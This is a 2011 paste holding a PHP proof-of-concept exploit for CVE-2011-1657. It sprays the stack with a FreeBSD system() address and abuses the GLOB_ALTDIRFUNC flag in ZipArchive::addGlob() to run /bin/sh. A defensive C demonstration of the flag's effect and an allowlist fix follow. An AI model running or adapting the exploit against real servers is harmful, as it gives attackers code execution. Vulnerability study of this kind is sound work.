
Untitled

a guest, Jul 4th, 2011
<?php
    /* CVE-2011-1657: PHP <= 5.3.6 ZipArchive::addGlob() missing glob flags filtering
     *
     * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pwn!
     *
     * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
     */

    /* Create a file for our md5_file() stack spray: 4096 bytes made of the
     * same 4-byte (32-bit) libc address repeated over and over.
     */
    $system_addr = "\x50\x78\x8d\x28";  /* FreeBSD 8.2-RELEASE system() libc addr, hardcoded for that build */
    $own = fopen("owned", "w");
    fwrite($own, str_repeat($system_addr, 4096 / 4));
    fclose($own);

    /* Fake zip: an empty file is accepted by ZipArchive::open() as a valid (new) archive.
     */
    $path = "foo.zip";
    if (file_exists($path)) {
        unlink($path);
    }
    fclose(fopen($path, "a"));
    $nx = new ZipArchive();
    $nx->open($path);

    /* Lame stack spraying \o/
     * md5_file() reads "owned" through a stack buffer, so copies of
     * $system_addr are left behind in the stack region that addGlob()'s
     * never-initialised glob_t (globbuf) will occupy next.
     */
    md5_file("owned");

    /* Bing. 64 is GLOB_ALTDIRFUNC on FreeBSD: with that flag glob() trusts
     * the gl_* function pointers inside the uninitialised globbuf, and every
     * one of them now reads back as system(), so "/bin/sh" ends up being
     * passed to system().
     */
    $nx->addGlob("/bin/sh", 64);
?>
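The bug the PoC above abuses is not in the zip code at all: it is that a flag word from PHP userland was handed straight to libc glob(), and GLOB_ALTDIRFUNC tells glob() to take its opendir/readdir/closedir/stat implementations from function pointers inside the caller's glob_t. The C program below is an added example, written for this page and not part of the original paste, that shows both halves of that on glibc/Linux: first that GLOB_ALTDIRFUNC really does divert glob() into whatever the gl_* slots hold (here benign wrappers that count the calls instead of system()), and second the class of fix the CVE received, masking the untrusted flag word against an allowlist before glob() ever sees it. Names such as `sanitize_glob_flags`, `opendir_calls_for`, `SAFE_GLOB_FLAGS` and the `cb_*` callbacks are hypothetical helpers made up for this example; the allowlist is my own choice, not PHP's exact mask. Note the flag's numeric value differs per libc (0x40 on FreeBSD, as the PoC hardcodes; 1 << 9 on glibc), one more reason to mask by symbolic name rather than by value.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <glob.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#ifndef GLOB_ALTDIRFUNC
#define GLOB_ALTDIRFUNC (1 << 9)   /* glibc's value; only needed under a strict -std= */
#endif

/* Call counters: how often glob() went through the gl_* slots we supplied. */
static int opendir_calls, readdir_calls, closedir_calls, stat_calls;

/* Benign stand-ins for the five glob_t callbacks. In the PoC above these
 * slots are filled by the md5_file() spray and all resolve to system();
 * here they forward to the real libc routines and just count the call. */
static void *cb_opendir(const char *path)
{
    opendir_calls++;
    return opendir(path);
}
static struct dirent *cb_readdir(void *dir)
{
    readdir_calls++;
    return readdir((DIR *)dir);
}
static void cb_closedir(void *dir)
{
    closedir_calls++;
    closedir((DIR *)dir);
}
static int cb_lstat(const char *path, struct stat *sb)
{
    stat_calls++;
    return lstat(path, sb);
}
static int cb_stat(const char *path, struct stat *sb)
{
    stat_calls++;
    return stat(path, sb);
}

/* Allowlist for a glob()-backed API whose flag word comes from an untrusted
 * caller (hypothetical helper for this example). GLOB_ALTDIRFUNC, GLOB_APPEND,
 * GLOB_DOOFFS and any bit not named here are cleared: the fix is to mask the
 * word, never to pass it through. */
#define SAFE_GLOB_FLAGS \
    (GLOB_ERR | GLOB_MARK | GLOB_NOSORT | GLOB_NOCHECK | GLOB_NOESCAPE)

int sanitize_glob_flags(int flags)
{
    return flags & SAFE_GLOB_FLAGS;
}

/* Run glob(pattern, flags) with a glob_t whose callback slots point at the
 * counters above, and report how many times gl_opendir was entered.
 * With GLOB_ALTDIRFUNC set this is >= 1 for any pattern that needs a
 * directory listing; with the flag masked out it is 0, because glob()
 * then ignores the slots entirely and calls opendir() itself. */
int opendir_calls_for(const char *pattern, int flags)
{
    glob_t g;
    memset(&g, 0, sizeof g);   /* the PoC depends on this NOT happening in the caller */
    opendir_calls = readdir_calls = closedir_calls = stat_calls = 0;

    /* __typeof__ casts keep the assignments exact whichever prototype this
     * libc's glob.h declares for the slots (GNU vs. POSIX variants). */
    g.gl_opendir  = (__typeof__(g.gl_opendir))cb_opendir;
    g.gl_readdir  = (__typeof__(g.gl_readdir))cb_readdir;
    g.gl_closedir = (__typeof__(g.gl_closedir))cb_closedir;
    g.gl_lstat    = (__typeof__(g.gl_lstat))cb_lstat;
    g.gl_stat     = (__typeof__(g.gl_stat))cb_stat;

    (void)glob(pattern, flags, NULL, &g);   /* match/no-match is irrelevant here */
    globfree(&g);
    return opendir_calls;
}

int main(void)
{
    int raw = GLOB_ALTDIRFUNC | GLOB_NOSORT;   /* what an untrusted caller could pass */
    printf("unsanitized flags 0x%x: gl_opendir entered %d time(s)\n",
           raw, opendir_calls_for("/*", raw));
    printf("sanitized flags   0x%x: gl_opendir entered %d time(s)\n",
           sanitize_glob_flags(raw),
           opendir_calls_for("/*", sanitize_glob_flags(raw)));
    return 0;
}
```

Run it and the first line reports at least one trip through the supplied gl_opendir, the second reports zero. In the vulnerable PHP build the same trip lands on whatever the sprayed stack held, which is the whole exploit; with the mask in place the flag never reaches glob() and the contents of the uninitialised glob_t stop mattering.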